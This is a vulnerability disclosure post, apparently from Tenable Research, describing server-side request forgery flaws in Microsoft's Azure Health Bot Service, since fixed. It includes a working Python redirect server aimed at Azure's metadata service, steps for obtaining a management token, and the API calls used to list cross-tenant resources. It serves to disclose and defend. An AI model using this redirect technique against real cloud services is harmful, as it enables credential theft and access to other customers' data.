Compromising Microsoft's AI Healthcare Chatbot Service

Tenable Research discovered multiple privilege-escalation issues in the Azure Health Bot Service via a server-side request forgery (SSRF), which allowed researchers access to cross-tenant resources.

Key takeaways

- The Azure Health Bot Service is a cloud platform that allows healthcare professionals to deploy AI-powered virtual health assistants.

- Tenable Research discovered critical vulnerabilities that allowed access to cross-tenant resources within this service. Based on the level of access granted, it’s likely that lateral movement to other resources would have been possible.

- According to Microsoft, mitigations for these issues have been applied to all affected services and regions. No customer action is required.

(Source: Image generated via ChatGPT 4o / DALL-E by Nick Miles)

An overview of the Azure Health Bot Service

This is how Microsoft describes the Azure Health Bot Service:

“The Azure Health Bot Service is a cloud platform that empowers developers in Healthcare organizations to build and deploy compliant, AI-powered virtual health assistants, that help them improve processes and reduce costs. It allows healthcare organizations to create experiences that act as copilots for their healthcare professionals to further manage administrative workloads, and experiences that engage with their patients.”

Essentially, the service allows healthcare providers to create and deploy patient-facing chatbots to handle administrative workflows within their environments. Thus, these chatbots generally have some amount of access to sensitive patient information, though the information available to these bots can vary based on each bot’s configuration.



While auditing this service for security issues, Tenable researchers became interested in a feature dubbed "Data Connections" in the service's documentation. These data connections allow bots to interact with external data sources to retrieve information from other services that the provider may be using, such as a portal for patient information or a reference database for general medical information.

The first discovery

This data connection feature is designed to allow the service’s backend to make requests to third-party APIs. While testing these data connections to see if endpoints internal to the service could be reached, Tenable researchers found that many common endpoints, such as Azure’s Instance Metadata Service (IMDS), were appropriately filtered or inaccessible. On closer inspection, however, they found that answering the service’s request with a redirect (e.g., a 301 or 302 status code) bypassed these mitigations.
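To see why a filter that inspects only the configured URL is not enough, consider the following minimal Python sketch. It is not the Health Bot Service's actual code: the function names (`is_internal_host`, `naive_check`, `per_hop_check`) and the attacker hostname are hypothetical, and the redirect chain is simulated as a plain list rather than fetched over the network.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_host(url: str) -> bool:
    """Return True if the URL's host is a literal loopback, private, or link-local IP."""
    host = urlsplit(url).hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal. A real filter would also resolve DNS names;
        # that step is omitted from this sketch.
        return False
    return addr.is_loopback or addr.is_private or addr.is_link_local


def naive_check(redirect_chain: list[str]) -> bool:
    """Approve the request by looking only at the first URL in the chain."""
    return not is_internal_host(redirect_chain[0])


def per_hop_check(redirect_chain: list[str]) -> bool:
    """Approve the request only if every hop, including redirect targets, is external."""
    return not any(is_internal_host(url) for url in redirect_chain)


# Simulated chain: the configured endpoint, then the Location it redirects to.
chain = [
    "http://attacker.example/data",  # hypothetical researcher-controlled host
    "http://169.254.169.254/metadata/instance?api-version=2021-12-13",
]

print(naive_check(chain))    # only the first URL is inspected
print(per_hop_check(chain))  # the link-local redirect target is inspected too
```

The naive check approves the chain because the first URL points to an external host, while the per-hop check rejects it once the link-local redirect target is inspected.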

“A server-side request forgery is a web security vulnerability that allows an attacker to force an application on a remote host to make requests to an unintended location.”



For example, by configuring a data connection within the service’s scenario editor, researchers were able to specify an external host under their control.

Researchers then configured this external host to respond to requests with a 301 redirect pointing to Azure’s IMDS.

    #!/usr/bin/python3
    # Minimal HTTP server that answers every GET with a 301 redirect to Azure's IMDS.

    from http.server import HTTPServer, BaseHTTPRequestHandler


    def servePage(s, hverb):
        # hverb is the HTTP verb of the incoming request (unused here)
        s.protocol_version = 'HTTP/1.1'
        s.server_version = 'Microsoft-IIS/8.5'  # value sent in the Server header
        s.sys_version = ''
        s.send_response(301)
        s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
        s.end_headers()
        message = ""  # empty response body
        s.wfile.write(bytes(message, "utf8"))
        return


    class StaticServer(BaseHTTPRequestHandler):
        def do_GET(self):
            servePage(self, "GET")
            return


    def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
        server_address = ('', port)  # listen on all interfaces
        httpd = server_class(server_address, handler_class)
        httpd.serve_forever()


    main()

After obtaining a valid metadata response, researchers attempted to obtain an access token for management.azure.com.
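For context, Azure's IMDS exposes a documented managed-identity token endpoint alongside the instance metadata endpoint used in the redirect, and it only answers requests that carry a `Metadata: true` header. The sketch below merely builds such a request to show its shape. The helper name `build_imds_token_request` is hypothetical, the `api-version` value comes from Microsoft's public documentation rather than from the researchers' report, and nothing is sent over the network.

```python
from urllib.parse import urlencode
from urllib.request import Request

IMDS_TOKEN_ENDPOINT = "http://169.254.169.254/metadata/identity/oauth2/token"


def build_imds_token_request(resource: str) -> Request:
    """Build (but do not send) an IMDS managed-identity token request."""
    query = urlencode({"api-version": "2018-02-01", "resource": resource})
    # IMDS rejects requests that lack the "Metadata: true" header.
    return Request(f"{IMDS_TOKEN_ENDPOINT}?{query}", headers={"Metadata": "true"})


req = build_imds_token_request("https://management.azure.com/")
print(req.full_url)
print(req.get_header("Metadata"))
```

The `resource` parameter names the audience the token is issued for, which is why a token requested this way can be presented to management.azure.com.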

With this token, researchers were then able to list the subscriptions they had access to via a call to https://management.azure.com/subscriptions?api-version=2020-01-01, which provided them with a subscription ID internal to Microsoft.

Finally, researchers were able to list the resources they had access to via https://management.azure.com/subscriptions/<REDACTED>/resources?api-version=2020-10-01. The resulting list contained hundreds of resources belonging to other customers.
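The two Azure Resource Manager calls above are ordinary authenticated GET requests. A minimal sketch of their shape follows. `arm_get` is a hypothetical helper, the token and subscription ID are placeholders, and the requests are constructed without being sent.

```python
from urllib.request import Request

ARM_BASE = "https://management.azure.com"


def arm_get(path: str, api_version: str, token: str) -> Request:
    """Build (but do not send) a GET request to Azure Resource Manager."""
    url = f"{ARM_BASE}{path}?api-version={api_version}"
    return Request(url, headers={"Authorization": f"Bearer {token}"}, method="GET")


token = "<ACCESS_TOKEN>"        # placeholder, not a real token
subscription_id = "<REDACTED>"  # placeholder, as in the text above

list_subscriptions = arm_get("/subscriptions", "2020-01-01", token)
list_resources = arm_get(
    f"/subscriptions/{subscription_id}/resources", "2020-10-01", token
)

print(list_subscriptions.full_url)
print(list_resources.full_url)
```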

A quick fix

Upon seeing that these resources contained identifiers indicating cross-tenant information (i.e., information for other users/customers of the service), Tenable researchers immediately halted their investigation of this attack vector and reported their findings to the Microsoft Security Response Center (MSRC) on June 17, 2024. MSRC acknowledged Tenable’s report and began its investigation the same day.

Within the week, MSRC confirmed Tenable’s report and began introducing fixes into the affected environments. As of July 2, MSRC has stated that fixes have been rolled out to all regions. To Tenable’s knowledge, no evidence was discovered that indicated this issue had been exploited by a malicious actor.

Doing it again

Once MSRC stated that this issue had been fixed, Tenable Research picked up where it left off to confirm that the original proofs of concept provided to MSRC during the disclosure process were no longer functional. As it turns out, the fix for this issue was to simply reject redirect status codes altogether for data connection endpoints, which eliminated this attack vector.
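One way to implement a "reject redirects" policy in a Python HTTP client is sketched below. It illustrates the general technique and is not Microsoft's actual fix. `NoRedirectHandler` and `fetch_without_redirects` are hypothetical names.

```python
import urllib.error
import urllib.request


class NoRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Turn every 3xx redirect into an error instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        raise urllib.error.HTTPError(
            req.full_url, code, f"redirect to {newurl} refused", headers, fp
        )


def fetch_without_redirects(url: str, timeout: float = 5.0) -> bytes:
    """Fetch a URL, raising HTTPError if the server answers with a redirect."""
    # Passing the subclass replaces urllib's default redirect handler.
    opener = urllib.request.build_opener(NoRedirectHandler)
    with opener.open(url, timeout=timeout) as response:
        return response.read()
```

With this opener, a server that answers with a 301 causes `fetch_without_redirects` to raise `urllib.error.HTTPError` instead of contacting the redirect target.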

That said, researchers discovered another endpoint, used for validating data connections to Fast Healthcare Interoperability Resources (FHIR) endpoints. This validation mechanism was vulnerable to more or less the same redirect-based attack described above. The difference between this issue and the first is the overall impact: the FHIR endpoint vector could not influence request headers, which limited the ability to access IMDS directly, since IMDS only answers requests that carry a Metadata: true header. While other service internals were accessible via this vector, Microsoft has stated that this particular vulnerability had no cross-tenant access.

As before, the researchers immediately halted their investigation and reported the finding to Microsoft, opting to respect MSRC’s guidance regarding accessing cross-tenant resources. This second issue was reported on July 9 with fixes available by July 12. As with the first issue, to Tenable’s knowledge, no evidence was discovered that indicated this issue had been exploited by a malicious actor.

Conclusion

The vulnerabilities discussed in this post involve flaws in the underlying architecture of the AI chatbot service rather than the AI models themselves. As explained by Lucas Tamagna-Darr in a Tenable research blog post last week, this highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI-powered services.

Please see TRA-2024-27 and TRA-2024-28 for more information regarding each of the discoveries mentioned in this post.
